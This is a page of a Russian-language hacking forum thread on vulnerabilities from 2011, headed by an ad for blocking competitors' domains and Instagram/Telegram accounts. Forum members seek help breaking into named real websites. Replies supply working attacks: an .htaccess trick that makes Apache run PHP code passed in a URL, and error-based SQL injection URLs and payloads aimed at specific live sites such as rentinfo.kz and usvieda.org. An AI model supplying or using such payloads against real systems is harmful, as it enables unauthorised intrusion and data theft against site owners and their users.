УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1891 из 2438

1891

Опции темы

Поиск в этой теме

Опции просмотра

#18901

18.12.2011, 02:27

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

http://help.infobox.ru/11-23

Цитата:

Сообщение от None

Также Вы можете воспользоваться утилитой PHPMyAdmin перейдя по ссылке http://mysql.infobox.ru

Но что то не открывается этот поддомен.

#18902

18.12.2011, 02:28

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от wkar

wkar said:
в одно скрипте читалка, в другом инклуд.

Ну раз инклуд есть, то вариантов много, сессии, логи, временные файлы.

#18903

18.12.2011, 05:39

SecondLife

Guest

Сообщений: n/a

Провел на форуме:
5997

Репутация: 21

Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.

Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.

Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.

#18904

18.12.2011, 05:42

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

Code:
SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'

мой запрос в кавычках, как от этого избавиться?

#18905

18.12.2011, 13:57

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от SecondLife

SecondLife said:
Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.
Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.
Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.

http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html

создаешь .htaccess с таким содержимым:

Код:

Code:

Order allow,deny
Allow from all

AddType application/x-httpd-php .htaccess
#

и вызываешь так: site.com/.htaccess?e=phpinfo();

Цитата:

Сообщение от faza02

faza02 said:

Код:

Code:
SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'

мой запрос в кавычках, как от этого избавиться?

нужно как минимум поставить одинарную кавычку:

SELECT * FROM db WHERE bd1 like '%' order by 100#'

#18906

18.12.2011, 16:34

KolosJey

Новичок

Регистрация: 21.12.2009

Сообщений: 0

Провел на форуме:
15756

Репутация: 0

Цитата:

Сообщение от infoseller

infoseller said:

Код:

Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA

Можно ли раскрутить? и как?

Например так

Код:

Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&keyword=1')/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)or/**/('1

#18907

18.12.2011, 17:28

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Expl0ited, спасибо

запрос схавал, правда реакции нет

http://www.usvieda.org/search.php

уязвимо поле поиска.

#18908

18.12.2011, 17:41

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от faza02

faza02 said:
Expl0ited
, спасибо
запрос схавал, правда реакции нет
http://www.usvieda.org/search.php
уязвимо поле поиска.

слоит 'and(select(max(1))from(information_schema.columns )group by(concat(version(),0x00,floor(rand(0)*2))))#

#18909

18.12.2011, 23:19

Breetonia

Guest

Сообщений: n/a

Провел на форуме:
7749

Репутация: 0

Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )

#18910

18.12.2011, 23:29

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

SELECT * FROM `database`.`table.name`

Страница 1891 из 2438

1891

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)

Быстрый переход